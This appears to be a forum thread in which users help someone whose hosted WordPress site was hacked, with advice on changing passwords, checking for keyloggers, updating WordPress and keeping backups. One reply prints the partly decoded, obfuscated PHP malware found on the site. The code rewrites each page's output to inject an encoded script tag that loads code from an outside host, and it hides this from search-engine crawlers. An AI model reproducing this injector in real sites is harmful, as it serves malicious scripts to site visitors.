Wordpress Hosted Site Hacked?

  • Thread starter Thread starter Guest
  • Start date Start date
The base64 thing is a complete pain. I had it happen to someone's shop (they didn't have backups) and it infected hundreds of files.

Did you save the string before deleting it? If you can post it I can probably tell you which files it infected / was using for the infection.

Looks like you've cleared the redirect now though.
 
This type of attack is commonly seen when your FTP details have been leaked or sniffed. Change all of your passwords, and check any PCs you use for trojans/keyloggers/malware.
 
frakker said:
Here you go:

Could this have infected any other files outside of Wordpress? Image files etc?

Would it be wise to change my FTP password and database information?
Click to expand...

The hack I saw infected all .php files and probably more; check the contents of .htaccess to make sure it's not doing something in there too.

As above it could have come from malware on your PC which is stealing Filezilla passwords. On the store I looked at it looked like it might have come from exploiting one of the admin files; make sure you use the latest version of Wordpress and keep it up to date.



Here's the "decrypted" code from above if you're interested, it's still obfuscated and somewhat of a pain to decrypt:

PHP: 
if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])) {
	
	$GLOBALS['mr_no']=1;

	if(!function_exists('mrobh')) {

		if(!function_exists('gml')) {
			function gml() {
				if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))) {
					return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly93d3cua2Rqa2Zqc2tkZmpsc2tkamYuY29tL2pzLnBocCI+PC9zY3JpcHQ+");
				}
				
				return "";
			}
		}

		if(!function_exists('gzdecode')) {

			function gzdecode($R5A9CF1B497502ACA23C8F611A564684C) {

				$R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));
				$RBE4C4D037E939226F65812885A53DAD9=10;
				$RA3D52E52A48936CDE0F5356BB08652F2=0;

				if($R30B2AB8DC1496D06B230A71D8962AF5D&4) {
					$R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
					$R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
					$RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;
				}

				if($R30B2AB8DC1496D06B230A71D8962AF5D&8) {
					$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
				}

				if($R30B2AB8DC1496D06B230A71D8962AF5D&16) {
					$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
				}

				if($R30B2AB8DC1496D06B230A71D8962AF5D&2) {
					$RBE4C4D037E939226F65812885A53DAD9+=2;
				}

				$R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));

				if($R034AE2AB94F99CC81B389A1822DA3353===FALSE) {
					$R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;
				}

				return $R034AE2AB94F99CC81B389A1822DA3353;
			}
		}

		function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B) {
			Header('Content-Encoding: none');
			$RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);

			if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)) {
				return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
			} else {
				return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
			}
		}

		ob_start('mrobh');
	} 
}
 
That htaccess looks fine. Might be a good idea to look at scheduling backups of all the files in future just incase though.

You should be able to keep your database (but reset all passwords) if you have a lot of content especially.
 
It it not just as likely to be a bug in Wordpress that caused the infection? Wordpress do release updates to fix exploits but you still have to install them yourself.
 
You must log in or register to reply here.
Back
Top Bottom